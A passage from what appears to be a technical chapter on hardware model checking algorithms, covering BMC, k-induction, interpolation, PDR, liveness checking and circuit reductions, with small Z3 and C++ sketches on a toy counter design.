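        succs.add(0)                    # rst == 1, or the wrap at c == 8
        if c != 8:
            succs.add((c + 1) % 16)     # rst == 0
    return succs

R = {0}                                 # R0 := Init
P = lambda c: c < 10                    # property P2
while True:
    assert all(P(c) for c in R), "counterexample found"
    R_next = R | post(R)
    if R_next == R:                     # fixed point: Ri => Ri-1
        print("P holds; reachable states:", sorted(R))
        break
    R = R_next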
BMC (Biere et al. 1999) is an iterative process for checking P on all initial
paths of M up to a given bound on the length. BMC is a SAT-based algorithm.
Given a transition system M and a specific length k, BMC translates the question
“Does M have a counterexample of length k?” into a propositional formula and
uses a SAT solver to determine if the formula is satisfiable or not. As explained
in Section “Representing Systems Symbolically”, a SAT solver can either find
a satisfying assignment or prove its absence. If the solver finds a satisfying
assignment, it is reported as a counterexample.
Algorithm 1: BMC
Function BMC(M, P, N)
  k ← 0;
  while k ≤ N do
    if ISSAT(ϕ^k) then
      return CEX;
    end
    k ← k + 1;
  end
  return P holds up to N;
end
Formula 2.  ϕ^k := Init(V^0) ∧ path_{0,k} ∧ ¬P(V^k),

where path_{0,k} := Tr(V^0, V^1) ∧ · · · ∧ Tr(V^{k−1}, V^k) encodes k consecutive
steps of the transition relation.

The formula ϕ^k implicitly represents all paths of length k in the transition system
that reach a bad state at step k. If there exists a satisfying assignment for ϕ^k, then
there exists a path of length k violating P, and the property does not hold.
In theory, BMC can conclude that the property holds on all reachable states once
N exceeds the diameter of the transition system: the length of the longest path
among all shortest paths from an initial state to some other state in the system.
However, in practice, it is hard to compute this bound, and even when known, it
is often too large to handle (Clarke et al. 2004). BMC cannot compute a trace and
therefore cannot find an inductive invariant. Thus, in practice, the main drawback of
BMC is its incompleteness: BMC can only prove the absence of counterexamples
of length up to a given bound but cannot guarantee that there is no counterexample
of arbitrary length.
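The following sketch implements the BMC loop of Algorithm 1 for the simplified counter and the failing property P1 : c ≠ 6, using Z3 incrementally (push/pop); the solver choice and variable names are assumptions of the sketch.

from z3 import BitVec, If, Solver, sat

def bmc(N):
    cs = [BitVec('c_%d' % i, 4) for i in range(N + 1)]
    s = Solver()
    s.add(cs[0] == 0)                                         # Init(V^0)
    for k in range(N + 1):
        s.push()
        s.add(cs[k] == 6)                                     # ¬P(V^k)
        if s.check() == sat:
            return k                                          # counterexample length
        s.pop()
        if k < N:
            s.add(cs[k + 1] == If(cs[k] == 8, 0, cs[k] + 1))  # grow path_{0,k}
    return None

print(bmc(10))   # prints 6: the counter reaches 6 in exactly 6 steps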
k-Induction

k-Induction (Sheeran et al. 2000) is a generalization of the induction principle and
consists of two steps: (1) a base case, which checks that all initial paths of length k
satisfy P, and (2) a step case (viz., the induction step), which checks that all paths
of length k that satisfy P can only be extended to paths of length k + 1 that also
satisfy P. A path is said to satisfy P if every state along the path satisfies P. Note
that such a path does not have to start at an initial state.
The two steps are now described in more detail:
• Base Case: Checking that all initial paths of length k satisfy P is equivalent
to proving there is no counterexample of length k or less. Hence, this step can
be executed using BMC. More precisely, by showing that ϕ^i is unsatisfiable for
0 ≤ i ≤ k.
• Step Case: To prove that every path of length k that satisfies P can only be
extended to a path of length k + 1 that also satisfies P, the following formula
needs to hold: (P(V^0) ∧ · · · ∧ P(V^k)) ∧ path_{0,k+1} ⇒ P(V^{k+1}). To check if
the above formula holds, the following formula is built:

Formula 3.  χ^k := (P(V^0) ∧ · · · ∧ P(V^k)) ∧ path_{0,k+1} ∧ ¬P(V^{k+1})
Algorithm 2: k-induction
Function kIND(M, P, N)
  if ISSAT(ϕ^0) then
    return CEX;
  end
  k ← 1;
  while k ≤ N do
    if ISSAT(ϕ^k) then
      return CEX;
    end
    if ISUNSAT(χ^k) then
      return P holds;
    end
    k ← k + 1;
  end
  return P holds up to N;
end
Example 4. Consider the transition system M from Fig. 2 and the property P :=
(c < 10). One can check that P is not 1-inductive. Written in a simplified form
(with the reset off), the formula P ∧ Tr ∧ ¬P′ becomes

(c < 10) ∧ (c′ = ((c == 8) ? 0 : c + 1)) ∧ ¬(c′ < 10),

which is satisfiable with c = 9 and c′ = 10. The unreachable state c = 9 is thus a
counterexample to induction.
By further strengthening the "inductive step" formulas χ^k with the simple path
constraint (which requires all the states on the path path_{0,k+1} to be distinct),
k-induction becomes a complete algorithm (Sheeran et al. 2000); that is, every true
property can be proven by k-induction for a suitable value of k. However, in practice
k-induction only works when a small value of k suffices for the proof, as otherwise
the formulas become too difficult for a SAT solver. As it happens, in practice,
k-induction is not able to solve most properties of interest, and other forms of
inductive reasoning are needed.
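The step case χ^k is equally direct to pose as a satisfiability query. In the sketch below (again with Z3, on the simplified counter), χ^0 is satisfiable because of the counterexample to induction c = 9, while χ^1 is already unsatisfiable: on this tiny design, k-induction succeeds with a small k.

from z3 import BitVec, If, ULT, Not, Solver, unsat

def step_case(k):
    cs = [BitVec('c_%d' % i, 4) for i in range(k + 2)]
    s = Solver()
    for i in range(k + 1):
        s.add(ULT(cs[i], 10))                                  # P(V^i), i = 0..k
        s.add(cs[i + 1] == If(cs[i] == 8, 0, cs[i] + 1))       # path_{0,k+1}
    s.add(Not(ULT(cs[k + 1], 10)))                             # ¬P(V^{k+1})
    return s.check() == unsat                                  # True iff χ^k is UNSAT

print([step_case(k) for k in range(4)])   # [False, True, True, True]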
Multiple complete SAT-based model checking algorithms are based on the concept
of interpolation. Given a pair of formulas (A, B) such that A ∧ B is unsatisfiable,
a Craig interpolant for (A, B) is a formula I such that A ⇒ I, I ∧ B is unsatisfiable,
and L(I) ⊆ L(A) ∩ L(B), where L(A) denotes the set of all atomic propositions
in A. Such an I always exists for an unsatisfiable pair (A, B).
The pseudocode for ISB appears in Algorithm 3. The procedure MKSEQ parti-
tions the BMC formula as described in the text. Moreover, the procedure ISSAT(Ak )
operates on the conjunction of the elements of the trace. Note also that when F
is closed, an inductive invariant is found (Definition 4 and Lemma 2). A detailed
description of ISB appears in Vizel and Grumberg (2009) and Cabodi et al. (2011).
In the original description of ITP (McMillan 2003), Formula 4 is used. ITP uses
nested loops, where the inner loop computes a safe trace by repeatedly checking
formulas of the form ψ^k with a fixed k, and the outer loop increases the bound
k when needed. The safe trace is computed inside the inner loop by extracting
interpolants from unsatisfiable BMC formulas. Let us now describe the nested loops
in more detail:
• Inner Loop: In general, the inner loop checks a fixed-bound BMC formula.
At the first iteration, ψ^k is checked. If this BMC formula is satisfiable, then a
counterexample exists, and the algorithm terminates. If it is unsatisfiable, then
the following (A, B) pair is defined:
– A := Init(V^0) ∧ Tr(V^0, V^1)
– B := path_{1,k} ∧ (¬P(V^1) ∨ · · · ∨ ¬P(V^k))
A detailed comparison between ITP and ISB appears in Vizel and Grumberg
(2009).
The introduction of PDR (Bradley 2011; Een et al. 2011) has drastically changed the
way that SAT-based model checking is perceived. Interpolation-based techniques,
usually referred to as "monolithic" approaches, use SAT solving as a black box
that can either find a satisfying assignment or generate a proof of unsatisfiability.
Intuitively, the proof of unsatisfiability represents a way to generalize a bounded
proof into a candidate inductive invariant. While interpolation-based approaches
utilize the full strength of state-of-the-art SAT solvers, there is little control over
the performed generalization or the "inductiveness" of the generated candidate.
PDR, however, waives some of the strengths of the SAT solver and in return gains
control over the generation of the candidate inductive invariant. This is achieved
by employing a very specific search strategy. PDR's search strategy is based on a
backward search that starts from the unsafe (or "bad") states in ¬P. The algorithm
maintains a monotonic safe trace F := ⟨F0, . . . , Fk⟩, where each frame Fi over-
approximates the set of states reachable from Init in up to i steps of Tr. In addition,
PDR maintains a queue Q of proof obligations ⟨s, i⟩, where s is a state that can reach
a bad state in some number of transitions and i is the level of s, defined as the index
of the smallest frame of the trace containing s (as the trace is monotonic, this means
that s ∈ Fi \ Fi−1). At each iteration, PDR picks a proof obligation ⟨s, i⟩ from Q,
prioritizing proof obligations with lower levels. Then PDR tries to find a one-step
predecessor of s in Fi−1 and add it to Q with level i − 1. If at any point Q contains
an initial state, then by construction there is a counterexample path from an initial
state to a bad state. If no one-step predecessor of s exists, then PDR "blocks" s
using a process called inductive generalization. The generalization technique yields
a clause that is inductive relative to Fi−1, which is then used to strengthen the
frames F0, . . . , Fi of the trace, excluding s from these over-approximations (see
Fig. 8). The algorithm terminates if either a counterexample is found or a frame is
determined to be an inductive invariant that proves the property.
Notably, the SAT queries made by PDR involve only a single step of the transition
relation. Each state s is represented by a conjunction of literals over V whose only
satisfying assignment corresponds to s; accordingly, its negation ¬s is a clause.
Consequently, the SAT queries performed by PDR are computationally cheap (in
comparison to ITP).
In the following, PDR is described in more detail. The PDR algorithm (Bradley
2011) iteratively refines and extends a monotonic safe trace whose frames are in
CNF. In each (outer) iteration, the algorithm performs one of two actions: if
Fk ∧ Tr ⇒ P′ holds, it extends the trace with a new frame Fk+1 (initialized to P);
otherwise, it extracts a state from the satisfying assignment, turns it into a proof
obligation, and refines the trace by blocking it as described above.
Example 5. Back to our running example, suppose that the property being verified
is P : c ≤ 10. Let us assume that just before its fourth (outer) iteration, PDR
has constructed the trace F := ⟨F0, F1, F2, F3⟩, with F0 = Init = {c = 0},
F1 = {c ≤ 1}, F2 = {c ≤ 2}, and F3 = {c ≤ 3}. One can easily verify that F is
indeed a safe inductive trace.
PDR starts a new iteration and checks whether F3 ∧ Tr ⇒ P′ holds, that is,
whether

(c ≤ 3) ∧ (c′ = ((c == 8) ? 0 : c + 1)) ∧ ¬(c′ ≤ 10)

is unsatisfiable. Clearly, this formula is unsatisfiable. PDR adds a new frame
F4 = {c ≤ 10} to the trace, resulting in F := ⟨F0, F1, F2, F3, F4⟩. The pushing
optimization is applied, but no clause can be propagated forward.
PDR starts another iteration and checks whether F4 ∧ Tr ⇒ P′ holds. The
corresponding formula is satisfiable with c = 10 and c′ = 11, yielding the proof
obligation ⟨c = 10, 4⟩. Since c = 10 has no predecessor in F3, PDR blocks the
obligation by adding the clause c ≠ 10 to F4 (and the lower frames), after which
F4 ∧ Tr ⇒ P′ holds and PDR adds a new frame F5 = {c ≤ 10} to the trace F.
The pushing optimization is applied but does not succeed in pushing the clause
c ≠ 10 from F4 to F5, as F4 ∧ Tr ⇒ (c′ ≠ 10) does not hold: the state c = 9
satisfies F4, and its successor is c = 10.
In the next iteration, PDR checks whether F5 ∧ Tr ⇒ P′ holds. It does not, and
the resulting proof obligation is ⟨c = 10, 5⟩. PDR then checks whether c = 10 has
a predecessor in F4. It does, and based on the satisfying assignment, PDR creates
another proof obligation ⟨c = 9, 4⟩. Since there is no predecessor of c = 9 in F3,
PDR blocks this proof obligation by adding c ≠ 9 to F4 (and the lower frames).
The proof obligation ⟨c = 10, 5⟩ is now also blocked as it no longer has a
predecessor in F4. Thus, PDR adds c ≠ 10 to F5. It is easy to see that
F5 ∧ Tr ⇒ P′ now holds. At this point, F := ⟨F0, F1, F2, F3, F4, F5⟩, with
F0 = Init = {c = 0}, F1 = {c ≤ 1}, F2 = {c ≤ 2}, F3 = {c ≤ 3},
F4 = {c ≤ 10, c ≠ 10, c ≠ 9}, and F5 = {c ≤ 10, c ≠ 10}.
Now, pushing is applied, and PDR tries to push c ≠ 9 from F4 to F5, that is, to
check whether F4 ∧ Tr ⇒ (c′ ≠ 9) holds. It does (every state satisfying F4 has
c ≤ 8, and its successor again has c ≤ 8), so c ≠ 9 is propagated to F5. At this
point F4 and F5 contain the same clauses, so a fixed point has been reached: F4 is
an inductive invariant that proves the property.
The above example demonstrates how PDR cleverly directs the generation of
the inductive invariant and how it replaces the few "monolithic" SAT queries used
by interpolation-based techniques with a large number of "incremental" single-step
queries. PDR owes additional performance improvements to numerous optimiza-
tions (Hassan et al. 2013; Gurfinkel and Ivrii 2015; Cabodi et al. 2017; Froleyks and
Biere 2021, to name a few).
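The two kinds of single-step queries from Example 5 look as follows when posed to Z3 (a sketch under the same simplified-counter assumption; a real PDR implementation would issue them through an incremental SAT interface).

from z3 import BitVec, If, ULE, Not, And, Solver, sat

c, cn = BitVec('c', 4), BitVec("c'", 4)
Tr = cn == If(c == 8, 0, c + 1)

def is_sat(*formulas):
    s = Solver()
    s.add(*formulas)
    return s.check() == sat

F4 = And(ULE(c, 10), c != 10)             # frame F4 after blocking <c = 10, 4>
# Can the trace be extended? F4 ∧ Tr ∧ ¬P' must be unsatisfiable:
print(is_sat(F4, Tr, Not(ULE(cn, 10))))   # False -> a new frame F5 is added
# Does the obligation state c = 10 have a predecessor in F4?
print(is_sat(F4, Tr, cn == 10))           # True: c = 9 -> obligation <c = 9, 4>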
Summary
Safety model checking is the backbone of many formal verification tools. This
section reviewed some of the most successful safety model checking algorithms.
Our exposition closely follows the history of advancements in relative scalability:
from explicit-state model checking to symbolic model checking with BDDs, to
bounded model checking and k-induction, to interpolation-based approaches, and
finally to PDR. It is important to note that in practice there is no “one algorithm
to rule them all,” and usually multiple algorithms are run in parallel on the
same verification task. When one algorithm reaches a definitive answer, all other
algorithms are terminated.
Introduction
Intuitively, a liveness property says that "a good thing must keep happening." In
linear time temporal logic, liveness properties are commonly expressed in the form
GFp, G(u → Fv), or FGq. The property of the form GFp states that on every
path the signal p must hold infinitely often, the property of the form G(u → Fv)
states that on every path every occurrence of u must be eventually followed by an
occurrence of v, and the property of the form FGq states that on every path the
signal q must eventually hold forever. A counterexample to a liveness property is
necessarily of infinite length. Liveness verification often involves the use of fairness
constraints f1, . . . , fm, which restrict the set of valid counterexamples to infinite
traces on which f1, . . . , fm hold infinitely often. Equivalently, a liveness property
of the form GFp together with fairness constraints f1, . . . , fm can be written as
GFf1 ∧ · · · ∧ GFfm ⇒ GFp. General liveness properties, together with fairness
constraints, may be reduced to either of the forms GFp or FGq using additional
logic (Wolper et al. 1983). While various liveness checking algorithms may benefit
from considering fairness constraints directly, in the present discussion of model
checking algorithms, it is assumed that the liveness property is either of the form
GFp or FGq, choosing the form that is best suited to the algorithm at hand.
Given a liveness property of the form GFp, a counterexample to such a property
is an infinite trace on which p holds only finitely many times. Since the state space
of hardware models is finite, such a counterexample can be represented by a lasso-
shaped trace, consisting of a prefix from an initial state to a ¬p-state s and a
repeating loop suffix from s back to itself, with ¬p holding on every state of the
loop suffix, as is illustrated in Fig. 9. Similarly, a counterexample to FGq is an
infinite trace on which ¬q occurs infinitely many times and can be represented by a
lasso-shaped trace, consisting of a prefix from an initial state to a ¬q-state s and a
repeating loop suffix from s back to itself (note that ¬q needs to hold only once on
the loop, and without loss of generality it is assumed that this happens at s).
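A lasso can be searched for directly with a BMC-style unrolling: require a state repetition and require ¬p on every state of the loop. The sketch below does this with Z3 for the property P3 = GF(c = 8) on the counter with a free reset input; the encoding is a standard one, and the names are illustrative.

from z3 import BitVec, Bool, If, And, Or, Solver, sat

def find_lasso(N):
    cs = [BitVec('c_%d' % i, 4) for i in range(N + 1)]
    rs = [Bool('rst_%d' % i) for i in range(N)]
    s = Solver()
    s.add(cs[0] == 0)
    for i in range(N):
        s.add(cs[i + 1] == If(rs[i], 0, If(cs[i] == 8, 0, cs[i] + 1)))
    # Some earlier state is revisited at step N, with c != 8 on the whole loop:
    s.add(Or([And(cs[l] == cs[N], *[c != 8 for c in cs[l:N]])
              for l in range(N)]))
    return s.model() if s.check() == sat else None

print(find_lasso(2))   # e.g., 0 -> 1 -> 0 with the reset on every second step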
Fig. 9 A lasso-shaped counterexample to the liveness property GFp consisting of a prefix and a
repeating loop suffix. An infinite-length counterexample to GFp can be obtained by (infinitely)
unrolling the loop suffix
Even though liveness checking and safety checking are in the same complexity
class, liveness checking is known to be significantly less scalable in practice.
Table 2 summarizes some of the most widely used techniques for liveness verifica-
tion. The following sections provide additional details.
Similar to safety model checking with BDDs described in section “Symbolic Model
Checking (with BDDs)”, liveness properties can be solved with BDDs via suitable
fixed-point computations. The reader is referred to Ravi et al. (2000) for the
detailed description and comparison of various BDD-based liveness algorithms.
Fig. 10 Liveness-to-safety conversion: (left) the original liveness property, (right) the equivalent
safety property
The main drawback of this translation is that it doubles the number of state variables,
substantially increasing the problem size and in practice yielding problems that are
very hard to verify. Therefore, developing algorithms that can natively solve the
original liveness problem remains an important research topic. Such algorithms are
presented in the following sections.
L2S with Abstraction The work of Baumgartner and Mony (2009) describes an
extension of L2S that trades completeness for a smaller design size. It uses abstraction
to choose a subset of the state elements duplicated for the state-repetition check. If the
abstracted translation yields a proof, this constitutes a valid proof for the original
translation (with all of the state elements duplicated). However, a counterexample
for the abstracted translation may not represent a valid counterexample for the
original translation, in which case refinement needs to be performed.
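The basic doubling construction is easy to exercise on the running example. The sketch below is a toy explicit-state rendition of it for GFp: a nondeterministic "save" latches the current state into a shadow copy, a "triggered" bit records that ¬p has held ever since, and revisiting the saved state with the bit set is the safety violation. Variable names and the brute-force search are illustrative only.

import itertools

def l2s_reach(p):
    init = (0, None, False, False)        # (c, shadow, saved, triggered)
    seen, frontier = {init}, [init]
    while frontier:
        c, sh, sv, tr = frontier.pop()
        if sv and tr and c == sh:         # saved state repeats, ¬p throughout
            return "lasso counterexample to GFp found"
        for rst, save in itertools.product([False, True], repeat=2):
            cn = 0 if (rst or c == 8) else c + 1
            shn, svn = (c, True) if (save and not sv) else (sh, sv)
            trn = svn and not p(cn) and (tr or not sv)
            nxt = (cn, shn, svn, trn)
            if nxt not in seen:
                seen.add(nxt)
                frontier.append(nxt)
    return "GFp holds"

print(l2s_reach(lambda c: c == 8))        # property P3: a counterexample exists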
Counter-Based Translation
Recall that to prove that a liveness property GFp holds, one needs to prove that for
every trace, starting from any state of the trace, the signal p must eventually occur.
The counter-based translation in Schuppan and Biere (2004) is based on attempting
to prove a stronger property Pk = GF k p for some value of k. The property Pk states
that for every trace, starting from any state of the trace, the signal p must hold within
k steps (or, equivalently, ¬p cannot occur for k steps in a row). Each such property
Pk is a safety property that can be solved by any safety model checker. Encoding Pk
only requires k additional state elements (i.e., does not require doubling the number
of state elements as in L2S). Given k, the proof of Pk yields the proof of the original
property, but a counterexample to Pk may not represent a counterexample to the
original property. Similarly to bounded model checking, a practical implementation
of this idea is to start with the value of k being 0 and to increase the value of k
by 1 each time that Pk is shown to be false. The technique was further improved
in Claessen and Sörensson (2012) as discussed next.
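As a behavioral sketch of this translation (the structure below is invented; a real implementation encodes the counter as k additional state elements on the netlist), the safety monitor for Pk can be written as:

// Behavioral sketch of the counter-based translation (illustration only):
// track the length of the current run of ~p states; the safety property
// P_k is violated once ~p has held for more than k consecutive steps
// (off-by-one conventions for "p must hold within k steps" vary).
struct CounterMonitor {
    unsigned k;            // bound currently being attempted
    unsigned run = 0;      // length of the current run of ~p states

    // One time step with the current value of p; returns false exactly
    // when the safety property P_k is violated.
    bool step(bool p) {
        run = p ? 0 : run + 1;
        return run <= k;
    }
};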
kLiveness
For describing this and the following algorithms, it will now be more convenient
to consider liveness properties of the form F Gq. Recall that such a property asserts
that on every trace the signal q must eventually hold forever, while an infinite-length
counterexample to F Gq is an execution for which ¬q occurs infinitely many times.
The KLIVENESS algorithm from Claessen and Sörensson (2012) counts the
maximal number of times that ¬q can occur. Effectively, this technique checks a
sequence of safety properties qk which evaluate to false when q evaluates to false
at least k + 1 times. Initially q0 = q, and qk+1 is obtained from qk by adding
“absorbing logic” that masks one occurrence of ¬q. If for some value of k, the safety
property qk is proven valid, then on every (infinite) path the signal ¬q can occur at
most k times, and thus the liveness property F Gq is valid. Figure 11 illustrates the
approach when k = 2.
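As a behavioral sketch of this construction (invented names; real tools add the equivalent logic at the netlist level), each absorbing stage and the chained signal qk can be written as:

#include <vector>

// Behavioral sketch of KLIVENESS absorbing logic (illustration only).
// Each stage masks the first ~q it observes, so a chain of k stages
// outputs q_k, which is false only once ~q has occurred at least
// k + 1 times; the safety check is G q_k.
struct AbsorbStage {
    bool used = false;               // has this stage absorbed one ~q yet?
    bool step(bool q_in) {
        bool q_out = q_in || !used;  // the first ~q_in is masked to true
        if (!q_in) used = true;      // sticky absorption
        return q_out;
    }
};

// One time step of q_k over a chain of k absorbing stages.
bool qk_step(std::vector<AbsorbStage>& chain, bool q) {
    for (AbsorbStage& s : chain) q = s.step(q);
    return q;
}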
A finite-length counterexample to qk for some k does not guarantee the existence
of a counterexample to the original liveness property or counterexamples for higher
values of k. However, if a finite-length counterexample happens to exhibit a state
repetition within which q evaluates to false, then it is a valid counterexample to the
original liveness property. Since the state space is finite, for a suitably large k, either
qk will be proven or a valid unbounded counterexample will be found. KLIVENESS is
thus sound and complete. As noted in Aleksandrowicz et al. (2013), in practice
unbounded counterexamples can often be detected even for small values of k. Given
the close relation between models being checked for increasing k, an incremental
model checker such as IC3 offers the advantage of reusing information such as
bounded and absolute invariants between each query.
Example 7. Consider the finite-state machine presented in Fig. 12. The path 000 →
001 is a path from an initial state on which ¬q occurs once; hence, the safety
property for k = 0 fails, and KLIVENESS increases k.
Fig. 11 A safety query produced by KLIVENESS for k = 2. If there is no execution for which ¬q
occurs three times, then F Gq holds
Fig. 12 A finite-state
machine with 8 states. The
signal q is true in states 000,
010, 011, 100, and 101 and
false in states 001, 110, and
111
FAIR
The FAIR algorithm (Bradley et al. 2011) searches for a lasso-shaped counterexample
directly. Given a candidate ¬q-state s, it creates two safety queries: one checking
whether s is reachable from an initial state, and one checking whether there is a path
from s back to itself, as illustrated in Fig. 13. Inductive proofs obtained from failed
queries restrict the remaining search space, as the following example shows.
Example 8. Consider again the finite-state machine in Fig. 12. FAIR may discover
that the states 110 and 111 cannot be reached from an initial state; this information
represents a “reachability assertion.” Additionally, FAIR may discover that the state
001 does not have a loop back to itself and thus may conclude that 001 cannot be on
the loop suffix of any potential counterexample; this type of information represents
a “wall.” As all of the ¬q-states are now eliminated, FAIR will conclude that F Gq
holds.
Fig. 13 Given a state s, FAIR creates two safety queries: one query checks whether there is a path
from Init to s, and one query checks whether there is a path from s back to itself
Combining KLIVENESS and FAIR The two algorithms KLIVENESS and FAIR
have different strengths. When F Gq is valid, KLIVENESS works well when a small
value of k is sufficient to prove unsatisfiability; otherwise, the underlying safety
queries become unscalable as k becomes large. FAIR works well when inductive
proofs restrict large portions of the search space; otherwise, too many iterations are
required. The work Ivrii et al. (2018) shows how one may combine the strengths of
both approaches.
Summary
Modern model checkers use a very diverse set of algorithms for solving liveness
properties. These include BDD-based approaches, converting liveness properties to
safety properties, constructing stronger bounded liveness properties, and exploring
the structure of how different states in the design may reach each other. There is no
best method overall, and a common practice is to run a portfolio of different algorithms
in parallel.
Reductions
This section gives a brief glimpse into the wealth of available reduction techniques.
Most model checkers internally represent the problem as a sequential circuit, with
the And-Inverter Graph format (Kuehlmann et al. 2002) being especially popular.
A circuit in this format contains only constants, primary inputs, two-input AND-
gates, inverters, and registers. Thus, the reduction techniques explicitly aim to
simplify this circuit, by minimizing the number of registers, inputs, and AND-
gates while guaranteeing that the simplified problem is equisatisfiable to the original
one. Reducing the number of registers is especially important, as this automatically
reduces the search space which algorithms like PDR need to explore.
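For concreteness, a minimal sketch of such a representation (field names are illustrative and loosely follow the common convention of encoding inversion in the low bit of a literal):

#include <cstdint>
#include <vector>

// Minimal sketch of an And-Inverter Graph (illustration only; real AIG
// packages differ in details). A literal encodes a node index in its upper
// bits and inversion in its low bit, so inverters need no nodes of their own.
using Lit = std::uint32_t;
inline Lit mkLit(std::uint32_t node, bool negated) {
    return (node << 1) | static_cast<std::uint32_t>(negated);
}

struct AndNode { Lit left, right; };  // two-input AND over literals

struct Aig {
    std::uint32_t numInputs = 0;      // primary inputs
    std::vector<AndNode> ands;        // combinational two-input AND gates
    std::vector<Lit> regNext;         // next-state literal for each register
    std::vector<Lit> outputs;         // output / property literals
};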
Retiming
Retiming attempts to reduce the number of registers by relocating them across com-
binational gates (Hurst et al. 2007; Kuehlmann and Baumgartner 2001; Baumgartner
and Kuehlmann 2001), in such a way that the number of registers does not change
on each path from a primary input to a primary output and on each loop.
Redundancy Removal
Redundancy removal (van Eijk 1998; Mony et al. 2009) is based on first identifying redundancy
candidates, for example, using symbolic simulation, and then on using induction to
prove these redundancies. Already proven redundancies can be exploited to prove
additional redundancies.
Input Reparameterization
Range-preserving parametric-reencoding procedures replace logic cones adjacent
to input variables with behaviorally equivalent logic cones with fewer input
variables (Baumgartner 2002; Moon et al. 2002; Eén and Mishchenko 2013). One
specific approach (Baumgartner 2002) is based on identifying a min-cut between
the inputs and the sequential elements and targets and replacing that cut with a
simpler resynthesized logic cone which comprises at most as many input variables
as the cut width. A faster but less precise approach (Eén and Mishchenko 2013) checks
if some inputs can be set to constant values while preserving the behavior of the
combinational part of the circuit. This transformation often reduces the gate count
as well.
Phase Abstraction
Phase abstraction performs a structural state folding and clocking abstraction used
to eliminate the verification overhead of “clocked” designs, where each clock
period comprises multiple verification time steps modeled using an oscillating
clock (Baumgartner 2002; Bjesse and Kukula 2005). At a high level, the algorithm
searches for oscillating clock-like logic in the circuit and eliminates this logic by
unfolding next-state functions of the sequential elements modulo their periodicity.
When applicable, this often eliminates many registers and often greatly enhances
the potential of other reduction techniques.
Over-approximations
Abstraction (Clarke et al. 1992) is a widely used method to mitigate the state
explosion problem. It aims to reduce the state space by removing details about
the system that seem irrelevant to the checked property, that is, do not seem to
be necessary either for verification or for refutation. Abstraction is best suited for
proving properties. For valid properties, in practice up to 90% of a design’s state
elements can be safely removed (preserving validity of the result), making the
abstraction substantially more powerful than the reduction techniques considered
previously. However, abstraction is ultimately an over-approximation technique that
introduces additional behaviors not present in the original design. Determining
which details about the system can be ignored without introducing erroneous (also
called spurious) behaviors is not an easy task.
The most common abstraction techniques described below are based on the
intuition that for a suitable bound k, the logic sufficient to prove the property for
the first k steps of the design is also sufficient for an unbounded proof.
Proof-Based Abstraction
Proof-Based Abstraction (PBA) (McMillan and Amla 2003) is a top-down approach
that considers the concrete transition system M and constructs an abstract model
after verifying that no counterexample exists up to a specific length. The approach
uses the ability of SAT solvers to compute an unsatisfiable core of an unsatisfiable
formula, that is, a subset of the formula’s clauses sufficient for unsatisfiability (Gold-
berg and Novikov 2003; Eén et al. 2010).
PBA is based on the BMC loop (see section “Bounded Model Checking”). At
each iteration, the formula ϕ^k (Formula 2) is checked using a SAT solver. If ϕ^k
is satisfiable, then a counterexample is found. Otherwise, ϕ^k is unsatisfiable, and
an unsatisfiable core UC(ϕ^k) is extracted. Let us define the set Va = {v | v_i ∈
Vars(UC(ϕ^k)), 0 ≤ i ≤ k} as the set of variables from the transition system that
appear in any of the unsatisfiable cores computed so far. Clearly, Va ⊆ V. The
abstract transition system Ma is derived from M by making all variables v ∈ V \ Va
nondeterministic (i.e., leaving them unconstrained). This abstraction, in the above
context, is usually referred to as a “visible variables” abstraction (Kurshan 1994).
This abstract model can now be passed to a complete model checking algorithm for
verification. If the property is proved on the abstract model Ma , then the property
also holds on the original model M, and the algorithm terminates. However, a
counterexample in Ma may not exist in M (due to the abstraction). In the case of a
spurious counterexample, the validity of the property remains unknown, and PBA
executes the next iteration of the BMC loop with a larger k.
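A schematic rendering of this loop in C++-flavored pseudocode (every type and helper function here is a hypothetical placeholder, not any particular tool's API):

// Schematic PBA loop (hypothetical interfaces, for illustration only);
// satSolve, unsatCore, and modelCheck stand for services a real tool
// builds on top of an incremental SAT solver.
Result proofBasedAbstraction(const Model& M) {
    VarSet Va;                                 // "visible" variables so far
    for (unsigned k = 0; ; ++k) {
        Formula phi_k = bmcUnroll(M, k);       // BMC formula for depth k
        SatResult r = satSolve(phi_k);
        if (r.isSat())
            return Result::counterexample(r.trace());  // real bug found
        addStateVars(Va, unsatCore(r));        // accumulate core variables
        Model Ma = abstractAwayAllBut(M, Va);  // others left unconstrained
        if (modelCheck(Ma).proved())
            return Result::safe();             // a proof on Ma lifts to M
        // otherwise the abstract counterexample is spurious: deepen the unrolling
    }
}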
Counterexample-Guided Abstraction
Counterexample-guided abstraction refinement (CEGAR) (Clarke et al. 2000, 2003)
is a bottom-up approach. CEGAR starts with a coarse abstract model Ma and
passes it to a model checking algorithm of choice. If a spurious counterexample
is found, Ma is refined. Refinement makes sure the spurious counterexample is
removed from Ma . Note that unlike PBA, CEGAR-based approaches do not remove
all counterexamples of a given length. This process continues until either a real
counterexample is found or Ma is proved to be safe with respect to the checked
property.
There are many variants of this framework. For example, CEGAR can be used
in conjunction with BMC in a similar manner to how PBA works. In this case,
CEGAR starts with a coarse abstract model Ma and the unfolding depth k = 1.
During the BMC stage, it looks for length-k counterexamples and uses spurious
counterexamples to refine Ma . When there are no counterexamples at a given
unfolding depth k, the unfolding depth is increased. The approach continues until
either a real counterexample is found or the abstracted model Ma is deemed
sufficiently adequate for proof analysis. In the latter case, Ma is passed to a complete
model checking algorithm for verification. As before, if Ma is safe with respect
to the checked property, then so is M and the algorithm terminates, while in the
case of a spurious counterexample the algorithm continues with a larger unfolding
depth.
Other Approaches
It is possible to combine PBA and CEGAR into a single hybrid approach (Eén et al.
2010; Mishchenko et al. 2013). First, as per CEGAR, a sufficiently adequate abstract
model is constructed bottom-up, refining spurious counterexamples up to a specific
length k. Second, as per PBA, the abstraction is shrunk to the variables appearing in
an unsatisfiable core and only then passed to a complete model checking algorithm.
The advantage of this hybrid strategy is that it completely avoids performing BMC
queries on the original model and hence may apply to designs with a very large
number of variables.
In the description of PBA and CEGAR above, the abstraction was stated in terms
of state variables. As the design is usually represented as a circuit, a more refined
approach is possible, based on stating the abstraction in terms of internal gates
(see Mishchenko et al. (2013)).
Summary
Modern model checkers use many different techniques to simplify and to abstract
a design, prior to running a complete model checking algorithm. In practice, these
techniques significantly improve verification run-times and are indispensable for
large designs.
Conclusion
References
Aleksandrowicz G, Baumgartner J, Ivrii A, Nevo Z (2013) Generalized counterexamples to
liveness properties. In: Formal methods in computer-aided design, FMCAD 2013, Portland,
20–23 Oct 2013. IEEE, pp 169–180
Baumgartner J (2002) Automatic structural abstraction techniques for enhanced verification. PhD
thesis, University of Texas
Baumgartner J, Kuehlmann A (2001) Min-area retiming on dynamic circuit structures. In: Ernst
R (ed) Proceedings of the 2001 IEEE/ACM international conference on computer-aided design,
